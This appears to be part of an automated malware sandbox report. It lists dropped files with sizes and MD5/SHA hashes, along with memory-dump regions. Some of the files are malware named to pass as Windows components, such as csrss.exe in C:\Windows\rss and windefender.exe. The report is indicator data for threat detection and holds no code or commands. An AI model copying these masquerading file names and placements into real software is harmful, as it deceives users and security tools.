  SHA512: c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c

• C:\Users\Admin\Pictures\RAus8SFt5ecM23w4L2GQk0YC.exe
  Filesize: 2.8MB
  MD5: 55fa2eb4e223cbb6ce4fd0827d593856
  SHA1: a399e71dc4efdc4b92b792cdfa4fdb27d806d9ee
  SHA256: 5cf5afa68b7d9001c6e28b1b29e4df7e9e311460f43c33292411bca3feb01c0a
  SHA512: 9851dc844faba6cfe71e613d84eda8704a0ec7b0039f268ba45662508eb5787e344e6c2d62a08c0bb407a168e25e86bb7eca92bd329417e156c3caeed42208b9

• C:\Users\Admin\Pictures\aCVfJ427wn6CARWtL1GFkhK1.exe
  Filesize: 2.1MB
  MD5: 9d959bcb3482d418504af43b76f7a181
  SHA1: 47dd5a464f2c42405b02aa36a9eabbc5974d27d9
  SHA256: e83ad3c722bbece6957751fe492c203bdfc0bc3ad1542a3943a4767bf547bb66
  SHA512: a12dd25fe8adea6a8a0af57710b004968ffe8a1f12e2d5370fee96c01d03cd72fe06689f187afdfe465dc83bf6eaa2ecfe9e64130b058a5d56f733f2a2e965f0

• C:\Users\Admin\Pictures\oHE5OfAE7uZo5wM5zxGSo2Yh.exe
  Filesize: 1.1MB
  MD5: 538cb930295aefeef9bebf008db228e4
  SHA1: c92dacd1dc00f61eaccd8fa53cf91b5307d7edfe
  SHA256: ac00c3344dc6acb42519fc867a0ee89c3b326575b213f2da94898e47c749762b
  SHA512: 851c1b3da2a043a1fc4f0ff93533ac22da1a5425d6f2c801f9fb0c4f2910979cdca3cdf4758e6c280566b996b2dffde9802fe518177d1ade906ceed6ddf21010

• C:\Users\Admin\Pictures\oHE5OfAE7uZo5wM5zxGSo2Yh.exe
  Filesize: 4.1MB
  MD5: cad0083dbfd452bf5d40d4072dec168c
  SHA1: ec7ef3799f7acbf3c032b7acc6dc44640874d222
  SHA256: 27f1f5f90341822b3e04c7b0035b2af5fe2dfd59263bcc05943f6141a4cba8a6
  SHA512: 6c22325b7a1b8ae337ea7fff9949f707e07267acd800a52eb007f1869279ec4246aa2e4556d35fa7fe55a80493bb6864dd442d5d329ce698580dd47b4c832e56

• C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: db01a2c1c7e70b2b038edf8ad5ad9826
  SHA1: 540217c647a73bad8d8a79e3a0f3998b5abd199b
  SHA256: 413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d
  SHA512: c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

• C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
  Filesize: 18KB
  MD5: 19956178e630dad9eedeca1c22e87912
  SHA1: 3437df18f39f510ee06cbe861f08fbcc6450804c
  SHA256: 2f139f903c89bca515c7ce8f5e44a95fb1b1dbcbd19bc94579335aa06ebe8b91
  SHA512: 50042bf0a72449947e093ee4439fbf62cc1f3bb9025d6a5f17f8ebb5e1166b4221338042f33d3d5f354a9f3c75bfc61a62c53c3853456c121fc2c964643fde37

• C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
  Filesize: 18KB
  MD5: 05197a455f1786d40ff19bb64e8e89be
  SHA1: 8be02fccd7da80704ea8bb9136bf3948e94533f9
  SHA256: 8d12e2c4f0450a5eb621a0eb682b2c184a12117eb511f96e7373832c982875bf
  SHA512: 25dfdeea8cfbd8fb9697a63488ff9610a7010ebdeb631ea080731f18d86c39f7022b76337f32971c778e11d37ce5120083d4725ed455d25ca369e8cabbe98829

• C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
  Filesize: 18KB
  MD5: 2a97e7f81c1d454a49062378623a6f2c
  SHA1: ba080f2b8cd4e3b5ca6232a2fa33853a6b8a7d29
  SHA256: 60b4f18ad3030da7606d380efb40b50b21cafa8829debc3d13ed31cfd35f0c09
  SHA512: 462dc3de142ee17db2d73c7e49a7a9fb2d0d05baaafefec646b8049d60d3cb09d6655a68deb48f8dd71f06af71f93c61208f3e0b54533ffe4ca6473c297d0039

• C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
  Filesize: 18KB
  MD5: 700b1ed23da7ab6a6d91958e45e80c24
  SHA1: 7facc2ed41e6cb931868d715916520a1033f4a7f
  SHA256: e9f838965892be02637dbb1df737181189c6715475677ee5bfb9e55999d9b1da
  SHA512: 3acdbf1f48cf9c89fd9661d991b198d135493eb67d9b32548ebdbf304bedd3b97fcb30085c0ad8d4cf94a4d7b6e9f1abfc175be7aa6d17485ea1e2f0bbd55b8b

• C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
  Filesize: 18KB
  MD5: 4eee5381d1db49d743f144313e9041dc
  SHA1: 82d5ac7fa8641d10d275b7f1d0b28741684e1875
  SHA256: f24168206f009d8eb2605fbf164831a6f55ff7c24a4d98deed4f366e484abf86
  SHA512: 96651b001dc19ab3596c7332305c2906358c404b7731ed9245977f3aa52946a0e99756a788152fcefc2ae4c697636958bf2b8dd4492aa7219bbc10aa577d4e15

• C:\Windows\rss\csrss.exe
  Filesize: 884KB
  MD5: 36fd5cc65e16087a6aa1e10cc8c5a4fc
  SHA1: a721f323b1df6273d9c9fb02f19bfa494b9e28c7
  SHA256: fa17c940226a87e0383e2719d29629ca4620a9a02a1150ba685772c8b2beb045
  SHA512: a85ab06d0a74b8fc0dfebc14345c14517dc546621ee87c572396d3951cfd18f8fa44a570b55a79cf797c3737bcb79436fdd96eda0d4e1594c15af44c5284abd5

• C:\Windows\rss\csrss.exe
  Filesize: 969KB
  MD5: 08de5b17056f729ab8e95b533d3a96bf
  SHA1: 3e75e7527ba5c7d08cbca0b03803bb27634fba99
  SHA256: 9a06df7bc834bf58d05f413b894d46d9e29dbd69f76c4cea548993699d0767bd
  SHA512: 9e4e07021927b18d273aa21a47375ef2fc98609cade5c8231dc7355a11d9a56cb0433558c295b09012928b5f39342666114d4e9a3ad0ef6f52843f3b48a60ad5

• C:\Windows\rss\csrss.exe
  Filesize: 128KB
  MD5: 0f8defd7b318d4958e302ad2227d99f0
  SHA1: 5745ab497e3fb3c665943d1a5c523bcca46f2000
  SHA256: ce2888ee58c8dbb43684ccc70353f7eb0f3393f4432f70348c77761526b41e90
  SHA512: 823d3526c2ac035d5b467d7a8cfcd359977a3aadca922492202e2885e5308b63e2c0a06db1f004955bb55552c35a444e405736916717c8615a83456e768001fe

• C:\Windows\windefender.exe
  Filesize: 2.0MB
  MD5: 8e67f58837092385dcf01e8a2b4f5783
  SHA1: 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
  SHA256: 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
  SHA512: 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

• \ProgramData\nss3.dll
  Filesize: 2.0MB
  MD5: 1cc453cdf74f31e4d913ff9c10acdde2
  SHA1: 6e85eae544d6e965f15fa5c39700fa7202f3aafe
  SHA256: ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
  SHA512: dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

• \Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\dbghelp.dll
  Filesize: 320KB
  MD5: 19c64d5c9f948beb2e285ba148ef9910
  SHA1: 0e0992d1b7462b5e532653dcef439c90b06d5c86
  SHA256: a2a1fe7c2085473b2e200964c53f802301cba6e94b610e229ccd2d003b813ec8
  SHA512: 65fa0db7e96dc0538771505f75255a2fec1027c137bba35d79994a8e6498a1108b24d9b21d70eb424173e768297dfdfe783fe264736a9a0debd21eccad4259ae

• \Users\Admin\AppData\Local\Temp\Opera_installer_24031213080251812036.dll
  Filesize: 1.7MB
  MD5: 9afd9ed1dcbf391dd9b60b34ae43565b
  SHA1: 8d3250d60b6da47530207764b3d7a03a867420ef
  SHA256: 8c8496ab675b64940339b585c03d2e985d4b030d235703424b3cabc585e1e947
  SHA512: 89dacb0be1c1acd7664112c4e677c6a46fa7b98fc008e4a3ef1b02725bce4f4cb8bec125dea3c2c425e97beb0dcb8e50e52baef2a6612e2680e2c899acfa5a91

                                                            • \Users\Admin\AppData\Local\Temp\Opera_installer_24031213080264313676.dll

                                                              Filesize

                                                              1.3MB

                                                              MD5

                                                              8abb587a43c1f4a95db34591c674763e

                                                              SHA1

                                                              6396cbc253f8f0bb5731205dfa9c8aa9a2e29833

                                                              SHA256

                                                              596adee4ecc69d9b1b7db42279152184bdc2561c84629c4766b5193983d5adc1

                                                              SHA512

                                                              5e792c7231d1ffb0cefd81cde48ae4153091ceeb1c62acc2128b6ff1edf7c8a9ea60a059dea07649727ed477215a6219f645ab5da2fbd5787a733340e1da9bcd

                                                            • \Users\Admin\AppData\Local\Temp\Opera_installer_24031213080337014960.dll

                                                              Filesize

                                                              2.6MB

                                                              MD5

                                                              a4cb16296627a24978b883fda008a55e

                                                              SHA1

                                                              b23635cbf294417997ac78f9c938439067240238

                                                              SHA256

                                                              a584f4c286c2090fc407993dd430dc6fd916a20b4e29cd06be4ac80a14dc0d21

                                                              SHA512

                                                              9b3198949b215a08d2700ad4a6bae20926857ff5edf93a4d0e210d99e01571a3983e05ad4c41a6d0782e8120acfb609a1f5282da06d16a7e15138308e2a44ae1

                                                            • \Users\Admin\AppData\Local\Temp\Opera_installer_24031213080354215204.dll

                                                              Filesize

                                                              2.7MB

                                                              MD5

                                                              fbbd112c5ac832872c1dd8d68f3d1ce5

                                                              SHA1

                                                              0257fc84b84dfa419a14cb7a756b6d7eac846315

                                                              SHA256

                                                              4f002058701022e0fef6c6b8a0a7ae83188eb39ab39282433fe0c85dd25980fc

                                                              SHA512

                                                              724fdaea74a04648c21f8e2c3dc085bdefbdb4742a82bd11670efba082de3fc182bf66b54911de8301ca7b04c66387af4ad9a17f96ca2bf93876845447eab729

                                                            • \Users\Admin\AppData\Local\Temp\is-GCK1T.tmp\_isetup\_iscrypt.dll

                                                              Filesize

                                                              2KB

                                                              MD5

                                                              a69559718ab506675e907fe49deb71e9

                                                              SHA1

                                                              bc8f404ffdb1960b50c12ff9413c893b56f2e36f

                                                              SHA256

                                                              2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

                                                              SHA512

                                                              e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

                                                            • \Users\Admin\AppData\Local\Temp\nsrA4CD.tmp\INetC.dll

                                                              Filesize

                                                              21KB

                                                              MD5

                                                              2b342079303895c50af8040a91f30f71

                                                              SHA1

                                                              b11335e1cb8356d9c337cb89fe81d669a69de17e

                                                              SHA256

                                                              2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f

                                                              SHA512

                                                              550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47

                                                            • memory/688-113-0x0000000002DD0000-0x00000000036BB000-memory.dmp

                                                              Filesize

                                                              8.9MB

                                                            • memory/688-111-0x0000000001120000-0x0000000001525000-memory.dmp

                                                              Filesize

                                                              4.0MB

                                                            • memory/688-115-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                              Filesize

                                                              9.1MB

                                                            • memory/688-231-0x0000000002DD0000-0x00000000036BB000-memory.dmp

                                                              Filesize

                                                              8.9MB

                                                            • memory/688-529-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                              Filesize

                                                              9.1MB

                                                            • memory/688-248-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                              Filesize

                                                              9.1MB

                                                            • memory/688-219-0x0000000001120000-0x0000000001525000-memory.dmp

                                                              Filesize

                                                              4.0MB

                                                            • memory/688-539-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                              Filesize

                                                              9.1MB

                                                            • memory/2184-87-0x0000000000400000-0x00000000005FE000-memory.dmp

                                                              Filesize

                                                              2.0MB

                                                            • memory/2184-80-0x0000000000400000-0x00000000005FE000-memory.dmp

                                                              Filesize

                                                              2.0MB

                                                            • memory/2184-216-0x0000000000400000-0x00000000005FE000-memory.dmp

                                                              Filesize

                                                              2.0MB

                                                            • memory/2184-1049-0x0000000000400000-0x00000000005FE000-memory.dmp

                                                              Filesize

                                                              2.0MB

                                                            • memory/2184-205-0x0000000000400000-0x00000000005FE000-memory.dmp

                                                              Filesize

                                                              2.0MB

                                                            • memory/2184-528-0x0000000000400000-0x00000000005FE000-memory.dmp

                                                              Filesize

                                                              2.0MB

                                                            • memory/2184-1609-0x0000000000400000-0x00000000005FE000-memory.dmp

                                                              Filesize

                                                              2.0MB

                                                            • memory/2184-2088-0x0000000000400000-0x00000000005FE000-memory.dmp

                                                              Filesize

                                                              2.0MB

                                                            • memory/3868-126-0x0000000000400000-0x000000000043D000-memory.dmp

                                                              Filesize

                                                              244KB

                                                            • memory/4044-1-0x00007FF9E8370000-0x00007FF9E8D5C000-memory.dmp

                                                              Filesize

                                                              9.9MB

                                                            • memory/4044-0-0x000002944D3E0000-0x000002944D3EE000-memory.dmp

                                                              Filesize

                                                              56KB

                                                            • memory/4044-2-0x000002944EFB0000-0x000002944EFC0000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/4044-16-0x0000029468210000-0x000002946826C000-memory.dmp

                                                              Filesize

                                                              368KB

                                                            • memory/4044-27-0x00007FF9E8370000-0x00007FF9E8D5C000-memory.dmp

                                                              Filesize

                                                              9.9MB

                                                            • memory/4044-42-0x000002944EFB0000-0x000002944EFC0000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/4320-77-0x0000000000400000-0x00000000005FE000-memory.dmp

                                                              Filesize

                                                              2.0MB

                                                            • memory/4320-73-0x0000000000400000-0x00000000005FE000-memory.dmp

                                                              Filesize

                                                              2.0MB

                                                            • memory/4320-74-0x0000000000400000-0x00000000005FE000-memory.dmp

                                                              Filesize

                                                              2.0MB

                                                            • memory/4320-78-0x0000000000400000-0x00000000005FE000-memory.dmp

                                                              Filesize

                                                              2.0MB

                                                            • memory/5968-530-0x0000000000800000-0x0000000000900000-memory.dmp

                                                              Filesize

                                                              1024KB

                                                            • memory/5968-1073-0x0000000000400000-0x000000000063B000-memory.dmp

                                                              Filesize

                                                              2.2MB

                                                            • memory/5968-447-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                                                              Filesize

                                                              972KB

                                                            • memory/5968-540-0x0000000000400000-0x000000000063B000-memory.dmp

                                                              Filesize

                                                              2.2MB

                                                            • memory/5968-136-0x0000000000400000-0x000000000063B000-memory.dmp

                                                              Filesize

                                                              2.2MB

                                                            • memory/5968-135-0x0000000000660000-0x0000000000687000-memory.dmp

                                                              Filesize

                                                              156KB

                                                            • memory/5968-531-0x0000000000400000-0x000000000063B000-memory.dmp

                                                              Filesize

                                                              2.2MB

                                                            • memory/5968-134-0x0000000000800000-0x0000000000900000-memory.dmp

                                                              Filesize

                                                              1024KB

                                                            • memory/5968-1826-0x0000000000400000-0x000000000063B000-memory.dmp

                                                              Filesize

                                                              2.2MB

                                                            • memory/9488-263-0x0000000000E30000-0x0000000000E31000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/9488-253-0x0000000000400000-0x0000000000930000-memory.dmp

                                                              Filesize

                                                              5.2MB

                                                            • memory/9488-128-0x0000000000400000-0x0000000000930000-memory.dmp

                                                              Filesize

                                                              5.2MB

                                                            • memory/9488-130-0x0000000000E30000-0x0000000000E31000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/10796-139-0x0000000004EE0000-0x0000000004F16000-memory.dmp

                                                              Filesize

                                                              216KB

                                                            • memory/10796-143-0x0000000007D10000-0x0000000007D76000-memory.dmp

                                                              Filesize

                                                              408KB

                                                            • memory/10796-140-0x0000000073900000-0x0000000073FEE000-memory.dmp

                                                              Filesize

                                                              6.9MB

                                                            • memory/10796-141-0x00000000076E0000-0x0000000007D08000-memory.dmp

                                                              Filesize

                                                              6.2MB

                                                            • memory/10796-142-0x00000000075E0000-0x0000000007602000-memory.dmp

                                                              Filesize

                                                              136KB

                                                            • memory/10796-144-0x0000000007D80000-0x0000000007DE6000-memory.dmp

                                                              Filesize

                                                              408KB

                                                            • memory/10796-145-0x0000000007FC0000-0x0000000008310000-memory.dmp

                                                              Filesize

                                                              3.3MB

                                                            • memory/10796-537-0x0000000073900000-0x0000000073FEE000-memory.dmp

                                                              Filesize

                                                              6.9MB

                                                            • memory/10796-532-0x0000000073900000-0x0000000073FEE000-memory.dmp

                                                              Filesize

                                                              6.9MB

                                                            • memory/10796-149-0x0000000008380000-0x000000000839C000-memory.dmp

                                                              Filesize

                                                              112KB

                                                            • memory/10796-493-0x0000000007200000-0x0000000007208000-memory.dmp

                                                              Filesize

                                                              32KB

                                                            • memory/10796-487-0x0000000007210000-0x000000000722A000-memory.dmp

                                                              Filesize

                                                              104KB

                                                            • memory/10796-265-0x000000000A530000-0x000000000A5C4000-memory.dmp

                                                              Filesize

                                                              592KB

                                                            • memory/10796-264-0x00000000070A0000-0x00000000070B0000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/10796-262-0x000000000A350000-0x000000000A3F5000-memory.dmp

                                                              Filesize

                                                              660KB

                                                            • memory/10796-257-0x000000000A2F0000-0x000000000A30E000-memory.dmp

                                                              Filesize

                                                              120KB

                                                            • memory/10796-255-0x000000007EC20000-0x000000007EC30000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/10796-256-0x000000006DD40000-0x000000006E090000-memory.dmp

                                                              Filesize

                                                              3.3MB

                                                            • memory/10796-254-0x000000006DCF0000-0x000000006DD3B000-memory.dmp

                                                              Filesize

                                                              300KB

                                                            • memory/10796-252-0x000000000A310000-0x000000000A343000-memory.dmp

                                                              Filesize

                                                              204KB

                                                            • memory/10796-150-0x00000000087F0000-0x000000000883B000-memory.dmp

                                                              Filesize

                                                              300KB

                                                            • memory/10796-169-0x0000000009420000-0x000000000945C000-memory.dmp

                                                              Filesize

                                                              240KB

                                                            • memory/10796-214-0x00000000094E0000-0x0000000009556000-memory.dmp

                                                              Filesize

                                                              472KB

                                                            • memory/12036-210-0x00000000009A0000-0x0000000000ED8000-memory.dmp

                                                              Filesize

                                                              5.2MB

                                                            • memory/13676-224-0x00000000009A0000-0x0000000000ED8000-memory.dmp

                                                              Filesize

                                                              5.2MB

                                                            • memory/14428-230-0x0000000000290000-0x00000000007C8000-memory.dmp

                                                              Filesize

                                                              5.2MB

                                                            • memory/14960-239-0x00000000009A0000-0x0000000000ED8000-memory.dmp

                                                              Filesize

                                                              5.2MB

                                                            • memory/15204-249-0x00000000009A0000-0x0000000000ED8000-memory.dmp

                                                              Filesize

                                                              5.2MB

                                                            • memory/17632-17-0x0000000000400000-0x0000000000408000-memory.dmp

                                                              Filesize

                                                              32KB

                                                            • memory/17632-18-0x0000000073900000-0x0000000073FEE000-memory.dmp

                                                              Filesize

                                                              6.9MB

                                                            • memory/17632-19-0x00000000057A0000-0x00000000057B0000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/17632-112-0x0000000073900000-0x0000000073FEE000-memory.dmp

                                                              Filesize

                                                              6.9MB

                                                            • memory/17632-114-0x00000000057A0000-0x00000000057B0000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/19500-1298-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                              Filesize

                                                              9.1MB

                                                            • memory/19500-547-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                              Filesize

                                                              9.1MB

                                                            • memory/19500-546-0x00000000010D0000-0x00000000014D3000-memory.dmp

                                                              Filesize

                                                              4.0MB

                                                            • memory/19904-550-0x0000000073900000-0x0000000073FEE000-memory.dmp

                                                              Filesize

                                                              6.9MB

                                                            • memory/20712-1851-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                              Filesize

                                                              9.1MB

                                                            • memory/20712-2090-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                              Filesize

                                                              9.1MB

                                                            • memory/21880-133-0x00000000001F0000-0x00000000001F1000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/21880-43-0x00000000001F0000-0x00000000001F1000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/21880-527-0x0000000000400000-0x00000000004BC000-memory.dmp

                                                              Filesize

                                                              752KB

                                                            • memory/22060-129-0x0000000000400000-0x0000000000414000-memory.dmp

                                                              Filesize

                                                              80KB

                                                            • memory/22060-36-0x0000000000400000-0x0000000000414000-memory.dmp

                                                              Filesize

                                                              80KB